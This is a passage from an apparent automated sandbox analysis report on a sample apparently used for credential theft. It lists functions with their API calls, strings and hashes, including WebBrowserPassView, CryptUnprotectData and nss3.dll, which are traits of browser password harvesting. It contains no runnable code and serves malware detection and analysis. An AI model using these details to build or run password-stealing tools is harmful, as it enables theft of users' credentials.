                                                                                                                                                    • Instruction Fuzzy Hash: CB5170B0508381AFD720DF55DC85A9BBBE8FBC8305F00492EF68882261DB74D985CB66
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D53E Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040D560
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                                                                                                      • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                                                                                                                      • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                                                                                                                      • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                                                                                                                      • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                                                                                                                      • Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
                                                                                                                                                      • Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
                                                                                                                                                      • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
                                                                                                                                                      • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
                                                                                                                                                      • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
                                                                                                                                                      • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97
                                                                                                                                                      • Part of subcall function 00407B1D: GetSaveFileNameW.COMDLG32(?), ref: 00407B6C
                                                                                                                                                      • Part of subcall function 00407B1D: wcscpy.MSVCRT ref: 00407B83
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                    • API String ID: 1392923015-3614832568
                                                                                                                                                    • Opcode ID: 380410c26e3291804c03af3795505405ed94cd18fa0364bdc388fa92e87f834b
                                                                                                                                                    • Instruction ID: 456ec3227f593179f02471f626d387f8bd8a0122acdd439c58b7a13f613657e4
                                                                                                                                                    • Opcode Fuzzy Hash: 380410c26e3291804c03af3795505405ed94cd18fa0364bdc388fa92e87f834b
                                                                                                                                                    • Instruction Fuzzy Hash: 6131FAB1D002599BDB50EFA9D8C1AEDBBB4FF09314F10417AF508B7282DF385A458B99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415DF9 Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00415E2B
                                                                                                                                                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00415E39
                                                                                                                                                    • free.MSVCRT(00000000), ref: 00415E7F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFilefreememset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2507021081-0
                                                                                                                                                    • Opcode ID: e3e327bc7edfa6d214c9f68350b0f1db51016015cf148b15bb91f804a777c83b
                                                                                                                                                    • Instruction ID: de39e7dabe3dcffc9507685f2d24beb71d21f2267e90135c35d9c9407e9ebe28
                                                                                                                                                    • Opcode Fuzzy Hash: e3e327bc7edfa6d214c9f68350b0f1db51016015cf148b15bb91f804a777c83b
                                                                                                                                                    • Instruction Fuzzy Hash: B111A236D04B05EBDB106FB498C06FF7368AA85754B54013BF911E6280D7789F8195AA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414D24 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00414D2B
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D49
                                                                                                                                                    • malloc.MSVCRT ref: 00414D53
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D6A
                                                                                                                                                    • free.MSVCRT(?), ref: 00414D73
                                                                                                                                                    • free.MSVCRT(?,?), ref: 00414D91
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4131324427-0
                                                                                                                                                    • Opcode ID: fcdf128664d182e83d2fd65dada33940b5d141c4db74cea0fb43d282e6a1fb2b
                                                                                                                                                    • Instruction ID: 75ff5f127907765bac19b59c8f0cf631f86937604d45831965c424c16304f1b7
                                                                                                                                                    • Opcode Fuzzy Hash: fcdf128664d182e83d2fd65dada33940b5d141c4db74cea0fb43d282e6a1fb2b
                                                                                                                                                    • Instruction Fuzzy Hash: 3501D4725041257BAF225BB6AC41DFF369CDF857B4721022AFC04E3280EA288E4141EC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004159C6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00415592), ref: 00415A0A
                                                                                                                                                    • GetTempPathA.KERNEL32(000000E6,?,?,00415592), ref: 00415A32
                                                                                                                                                    • free.MSVCRT(00000000,0044A338,00000000), ref: 00415A5A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PathTemp$free
                                                                                                                                                    • String ID: %s\etilqs_$etilqs_
                                                                                                                                                    • API String ID: 924794160-1420421710
                                                                                                                                                    • Opcode ID: c9ef72f7e900502d242bf52f2b84dfc3543ee2498ca2d646e121c62c04ad21fe
                                                                                                                                                    • Instruction ID: 407cf19e3f66aff666bf3235626637e86bc259e86a40955958787b48e693a0c3
                                                                                                                                                    • Opcode Fuzzy Hash: c9ef72f7e900502d242bf52f2b84dfc3543ee2498ca2d646e121c62c04ad21fe
                                                                                                                                                    • Instruction Fuzzy Hash: 80316831A44645DAE720EB61DCC1BFB739C9FA4348F1405BFE841D6182FE6C8EC54A19
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C0F2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                                                                                                      • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                                                                                                                    • memset.MSVCRT ref: 0040C129
                                                                                                                                                      • Part of subcall function 004124C0: memcpy.MSVCRT ref: 0041253D
                                                                                                                                                      • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                                                                                                                      • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040C173
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                    • API String ID: 2236007434-2769808009
                                                                                                                                                    • Opcode ID: 438c6ceffbcd68a890abf2b9136991ccf46c150bae825d1d06f9ba09c855681a
                                                                                                                                                    • Instruction ID: bd8afa7c54c2b984639c4d8fb182e53c6b214fce1ab7be0445daf1b4a409d2ac
                                                                                                                                                    • Opcode Fuzzy Hash: 438c6ceffbcd68a890abf2b9136991ccf46c150bae825d1d06f9ba09c855681a
                                                                                                                                                    • Instruction Fuzzy Hash: 82119132904615BFEB11AF65DC82E99BB74FF04318F10402AF9046A5E2DB75B960CBD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D83C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040D86C
                                                                                                                                                      • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040D886
                                                                                                                                                    • wcscat.MSVCRT ref: 0040D8A2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                    • String ID: .cfg$General
                                                                                                                                                    • API String ID: 776488737-1188829934
                                                                                                                                                    • Opcode ID: e11df5378bc83a8aaf871442e4d8661d85e0e936ac587c009724adb380b412fa
                                                                                                                                                    • Instruction ID: b769b6074c2bbd437ee926744873151467191c08e4afcaaf49059e595a4f98b4
                                                                                                                                                    • Opcode Fuzzy Hash: e11df5378bc83a8aaf871442e4d8661d85e0e936ac587c009724adb380b412fa
                                                                                                                                                    • Instruction Fuzzy Hash: 34119877901318AADB10EF55DC45ECE7378AF48314F1041F6F518A7182DB78AA848F9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040E051
                                                                                                                                                    • RegisterClassW.USER32 ref: 0040E076
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040E07D
                                                                                                                                                    • CreateWindowExW.USER32 ref: 0040E09C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                    • String ID: WebBrowserPassView
                                                                                                                                                    • API String ID: 2678498856-2171583229
                                                                                                                                                    • Opcode ID: 968ab77318ecbfefce790601fd2619178d52abf01415595e0110a8aaad309429
                                                                                                                                                    • Instruction ID: d6937ed4ed068f8a41babfbfc400960a7e9d41ce1fcf29d78c1aeb4d070e2d0f
                                                                                                                                                    • Opcode Fuzzy Hash: 968ab77318ecbfefce790601fd2619178d52abf01415595e0110a8aaad309429
                                                                                                                                                    • Instruction Fuzzy Hash: 5301C4B1901629ABDB019F998D89ADFBFBCFF09B50F10421AF514A2240D7B45A408BE9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040C2EB
                                                                                                                                                    • memset.MSVCRT ref: 0040C302
                                                                                                                                                      • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                                                                                                      • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                                                                                                                      • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                                                                                                                      • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040C33E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>
                                                                                                                                                    • API String ID: 168708657-3296998653
                                                                                                                                                    • Opcode ID: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
                                                                                                                                                    • Instruction ID: 826567bfe222e6a97a7157a9ef984588091dd6de8d25c20f5ec279ce0d2f683a
                                                                                                                                                    • Opcode Fuzzy Hash: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
                                                                                                                                                    • Instruction Fuzzy Hash: 780167F2D401297AEB20A755CC46FEE767CEF44308F0000B6BB09B61D1DB78AA458A9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00403853 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: CryptUnprotectData$crypt32.dll
                                                                                                                                                    • API String ID: 145871493-1827663648
                                                                                                                                                    • Opcode ID: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
                                                                                                                                                    • Instruction ID: e5a88ed766aaa6e52f35248584035ac6595561cae6bd6684aeb1aa38a92ec81b
                                                                                                                                                    • Opcode Fuzzy Hash: 2c4a40dc8dba4f0dc647d95a29ca81113139f6a9c6e20ee821370f4bbf0a04ed
                                                                                                                                                    • Instruction Fuzzy Hash: 0A011A32500611ABC6219F158C4881BFEEAEBA1B42724887FF1C5E2660C3748A80CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411DB2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • wcscpy.MSVCRT ref: 00411DC1
                                                                                                                                                    • wcscpy.MSVCRT ref: 00411DDC
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040D8DB,00000000,?,0040D8DB,?,General,?), ref: 00411E03
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 00411E0A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                    • String ID: General
                                                                                                                                                    • API String ID: 999786162-26480598
                                                                                                                                                    • Opcode ID: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
                                                                                                                                                    • Instruction ID: 9a0facac0be4658f1d28dd1d6e0b9c096870c14066d41f215ae7e32982aabb00
                                                                                                                                                    • Opcode Fuzzy Hash: cadc9dc89eee371cf065a8da49e6c42cc2605fbbb286be73d28d450c39e40844
                                                                                                                                                    • Instruction Fuzzy Hash: 9AF024B2508301BFF3109B90AC85EAF769CDB10799F20842FF20591061DA396D50825D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004071BD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,0040C6FE,00000000,?,?,?,0040E2DC,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004071D1
                                                                                                                                                    • _snwprintf.MSVCRT ref: 004071FE
                                                                                                                                                    • MessageBoxW.USER32(?,?,Error,00000030), ref: 00407217
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                    • String ID: Error$Error %d: %s
                                                                                                                                                    • API String ID: 313946961-1552265934
                                                                                                                                                    • Opcode ID: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
                                                                                                                                                    • Instruction ID: 3b05860ebe56c522f2c5ab20428fa68284bb982c16b5ab54bfd07cc8ba07ffa8
                                                                                                                                                    • Opcode Fuzzy Hash: 61e844944dbca76b68da5b3baf56ea9390605b233e584b109607b5eb60119b4a
                                                                                                                                                    • Instruction Fuzzy Hash: 74F0E23680021867DB11AB94CC02FDA72ACBB54B82F0400AAB905F2180EAF4EB404A69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412455 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(shlwapi.dll,74EB48C0,?,004048E6,00000000), ref: 0041245E
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0041246C
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,004048E6,00000000), ref: 00412484
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                    • API String ID: 145871493-1506664499
                                                                                                                                                    • Opcode ID: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
                                                                                                                                                    • Instruction ID: b7e45597e31c4a606350929a185ef34a25fe7475720eeaf8429eabe2a59cceae
                                                                                                                                                    • Opcode Fuzzy Hash: 0600c3fa923ac600481c4c27bdc763d37aac4bb3cec4cb789f1cecb2c3029c00
                                                                                                                                                    • Instruction Fuzzy Hash: 6BD05B393502206BA7116F35BC48EAF2E65EFC6F537150031F501D1260CB544E429669
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043310B Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 390COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                    • API String ID: 0-1953309616
                                                                                                                                                    • Opcode ID: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
                                                                                                                                                    • Instruction ID: 956c7fa9d19c0f39a897be9568c0d7cc0038550a6314a583777b8070e5951de7
                                                                                                                                                    • Opcode Fuzzy Hash: 62ebdc269ebb98b136c9f16b4865919ffe4bf71bf72261f46eacdebf5a67e72f
                                                                                                                                                    • Instruction Fuzzy Hash: 90E18F71E00208EFDF14DFA5D881AAEBBB5FF48304F14846EE805AB251DB79AE41CB55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042EDD2 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 230COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 0042EFB9
                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 0042EE56
                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 0042EE2E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                    • Opcode ID: 26b123652edab92ce6a15b49f3ba4f50a5fd80d5e605533ee84f76b45fb6fb0c
                                                                                                                                                    • Instruction ID: 495bb5eb18a6352e4e4c54452741b55d9a16d19d8a312fbbfa639f366bc90293
                                                                                                                                                    • Opcode Fuzzy Hash: 26b123652edab92ce6a15b49f3ba4f50a5fd80d5e605533ee84f76b45fb6fb0c
                                                                                                                                                    • Instruction Fuzzy Hash: 72914C71A0021ADFCB10CF5AD580A9EBBF1FF58314B55856AE809AB302D735E945CF98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004063C1 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memsetwcslen$wcscatwcscpy
                                                                                                                                                    • String ID: nss3.dll
                                                                                                                                                    • API String ID: 1250441359-2492180550
                                                                                                                                                    • Opcode ID: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
                                                                                                                                                    • Instruction ID: 7e6fc29c8000acf8dfdc2cef167c58109b3e52db234c734628f4c22aee9d38d0
                                                                                                                                                    • Opcode Fuzzy Hash: 539cc7b2b5a1ca4a5cded3f0901bcdf604bea04d283746a690f02e85a837d118
                                                                                                                                                    • Instruction Fuzzy Hash: E711ECB2D0421DAADB10E750DD45BCA73EC9F10314F1004B7F60CE20C2F778AA548A9D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040AE21 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AE3C
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AE4F
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AE62
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AE75
                                                                                                                                                    • free.MSVCRT(00000000), ref: 0040AEAE
                                                                                                                                                      • Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                    • Opcode ID: 1ee9c0bd248601916a1146cb301d571c7104734ae8e82a7a1079c5bd7d19b95f
                                                                                                                                                    • Instruction ID: 5cedf5899733f7fd452d28a3e5974aab2a3b061775a7969347507653aae84efd
                                                                                                                                                    • Opcode Fuzzy Hash: 1ee9c0bd248601916a1146cb301d571c7104734ae8e82a7a1079c5bd7d19b95f
                                                                                                                                                    • Instruction Fuzzy Hash: 13010832946A20ABC6367B2AD50251FB368BE91B90306457FF445BB3818F3C7C5186DF
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414CBE Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00414CC6
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00414CE6
                                                                                                                                                    • malloc.MSVCRT ref: 00414CEC
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00414D0A
                                                                                                                                                    • free.MSVCRT(?), ref: 00414D13
                                                                                                                                                    Memory Dump Source
